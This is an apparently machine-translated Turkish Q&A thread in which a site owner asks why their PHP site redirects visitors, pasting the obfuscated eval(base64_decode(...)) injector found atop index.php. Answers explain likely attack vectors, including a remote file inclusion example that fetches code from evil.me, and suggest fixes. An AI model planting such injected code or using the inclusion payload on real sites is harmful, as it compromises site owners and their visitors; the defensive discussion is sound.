PHP: I got hacked

9 Cevap php

Ben sadece sitemde aniden bu siteye beni atlar kontrol:

xxxp://www1.re*******3.net/?p=p52dcWpkbG6HjsbIo216h3de0KCfaFbVoKDb2YmHWJjOxaCbkXp%2FWqyopHaYXsiaY2eRaGNpnFPVpJHaotahiaJ0WKrO1c%2Beb1qfnaSZdV%2FXlsndblaWpG9plmGQYWCcW5eakWppWKjKx6ChpqipbmdjpKjEjtDOoKOhY56n1pLWn1%2FZodXN02BdpqmikpVwZWpxZGxpcV%2FVoJajYmJkZ2hwlGGXaVbJkKC0q1eum5qimZxx

Benim index.php dosyasının ilk satırında, bu gibi görünüyor olduğunu öğrendim:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHR/*

Snip

*/DkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>

Bunu nasıl durdurabilirim? teşekkürler!

UPDATE: What kind of attack is this? is this really xss? No one really knows about my ftp password.

9 Cevap

Birisi sunucu üzerinde php dosyalara erişimi (değil xss veya sql-enjeksiyon yoluyla) bulunmaktadır. Bu paylaşılan bir sunucu ise bu tüm sunucu şekilde tatlıya çok mümkündür. Eğer php dosyaların üstünde o bok kaldırmak ve onları salt okunur yapabilirsiniz. Web barındırma ilk etapta bu izin güvenlik kusuru düzeltmek yaramazsa Ancak, ben tahmin ediyorum gibi bu, paylaşılan bir sunucu, bu yeterli olmayabilir. Barındırma sağlayıcı konuşun (şahsen ben sadece yeni bir sağlayıcıya hareket ediyorum, bu bu adamlar umutsuz olduğunu iyi bir işaret.)

Eğer üzerinde open_wrappers = var ve sitede bir yerde böyle bir şey kullanıyorsanız

http://domain.tld/index.php?page=somenameofpage

Somewhere index.php (veya içerdiği dosyaları) içinde

<?php

include($page . '.php');

?>

Sonra birisi isteyerek sitenize uzlaşma olabilir

http://domain.tld/index.php?page=http://evil.me/evilcode.txt?

(value of page should be urlencoded to work - i'm lazy so didn't urlencode it. Note the ? at the end..

Ne şimdi gerçekten dahil olduğunu

http://evil.me/evilcode.txt?.php

- Evilcode.txt -

<?php

echo 'some evil code huh!';

Bu vil evilcode.txt içinde php kodu çalıştırmak

Bir QuickFix bir eklemek olacaktır. dahil yoluna - Böyle

include('./' . $page . '.php');

Ben navigasyon için bu yöntemi kullanılan mevcut sitenin admin Oldu .. bu zor yoldan öğrendim. Hacker herhangi bir kod yerini vermedi satışlardaki, onu anlamaya ay sürdü - o sadece bazı alt klasörlerdeki dosyaları ekledi. Ve evet, o bir. Js bazı arka kapı eklenmiş ve. Css Kullanıcıların AntiVir aldı ki filse.

, Sunucu Güvenli try contacting the relevant people, sunucu saldırıya uğramış gibi görünüyor.

Kod satırı kaldırın?

Bu, saldırganın sunucu dosyalarını değiştirmek için izin sunucunuzda bir saldırıdır. Bu (bir 777 izni kötü olan) klasör izinleri aracılığıyla olabilir, ya da komut sunucu üzerindeki diğer komut dosyaları değiştirmek için izin verirseniz.

Eğer klasör izinleri üzerinden bakmak isteyebilirsiniz.

Bu saldırının ne tür? Bu gerçekten XSS nedir? Hiç kimse gerçekten benim ftp şifre biliyor.

Saldırı bu tür pek çok vektör vardır:

Yazılım güvenlik açığı. Bu eski PHP, MySQL, Apache veya çalışan başka sadece hakkında bir şey içerebilir. Tüm sunucu comprimised olabilir.

Betik açığı. Genellikle komutları yüklemek ve çalıştırmak için kullanılan bir yaygın olarak kullanılan PHP uygulaması ile bir güvenlik açığı. Ortak bir betik (genellikle PHP yönetici tarafından izin herhangi bir eylem için izin, uzatma geri orijinal php için jpg gelen sunucu üzerinde yeniden adlandırılması sağlayan, yükleme değiştirildi php dosyalarının içine kandırdın, ve sonra çalıştırın fotoğraf galerisi yazılımı olan / root kit) saldırgana özgürce yüklemek ve dosyaları değiştirme yeteneği vererek bu şekilde yüklenir

FTP kaba kuvvet saldırısı. Genellikle sunucu tekrarlanan başarısız oturum açma girişimleri yapmak IP blok adresi edebilmek için yapılandırılmalıdır.

Kullanıcı enfeksiyon. Saldırı, bir trojan nispeten yeni bir vektör geçen kullanıcıların bilgisayarına trojan yüklemek için (çoğu şimdiye kadar bu FireFox çalışır, ancak herhangi bir tarayıcı bu kod yürütme çalışacaktır olanak istismar aslında nedeniyle Adobe PDF Reader eklentisi güvenlik açıklarını kullanan). Trojan kayıtlı şifreler arıyor, Filezilla ve Dreamweaver gibi ortak FTP programları için kullanıcılar bilgisayar arar. Bir FTP o (HEAD etiketi için en çok arama ve sadece bundan sonra insert) kendi kod ekleme, kullanıcıların kendi bilgisayar ve bilinen dosya türlerini (htm, php, asp, vb) değiştirmek için girişimlerinden siteyi erişen giriş bulur sonra - aslında kullanıcıların bilgisayarınıza bulaşmış aynı kod. Bir kere yapılır o (adware yüklemek, ya da gizli kalmak ve bir botnet kullanıcıların bilgisayar parçası yapmak) diğer herhangi bir trojan gibi çalışabilir.

Biz aynı problem vardı. Kullanıcılar herhangi bir uzantısı ile dosya upload ve sunucu bunları çalıştırmak mümkün çünkü itiraf etmek gerçekten utanıyorum, ama ne oldu bizim için. Yani, bazı kullanıcı php script tarih ve idam etmişti. :-)

Biz filtrelerini ayarlayarak sorunu çözmüş ve salt okunur yüklenen dosyalar üzerinde bağlıyor ettik.

Sadece bu satırı kaldırmak ve sunucu saracağım. Büyük bir olasılıkla, arka kapı bulaşmış.

Çoğu insan ilk viral kodunu kaldırarak ve ardından kullanılan saldırı PHP dosyaları yazmak için o istismar ararken tüm PHP dosyaları salt okunur yaparak kod enjeksiyon saldırıları durdurun.

Çoğu zaman bazı trojan programı tarafından geliştiricinin PC'den çalınan ftp şifreleri bulunuyor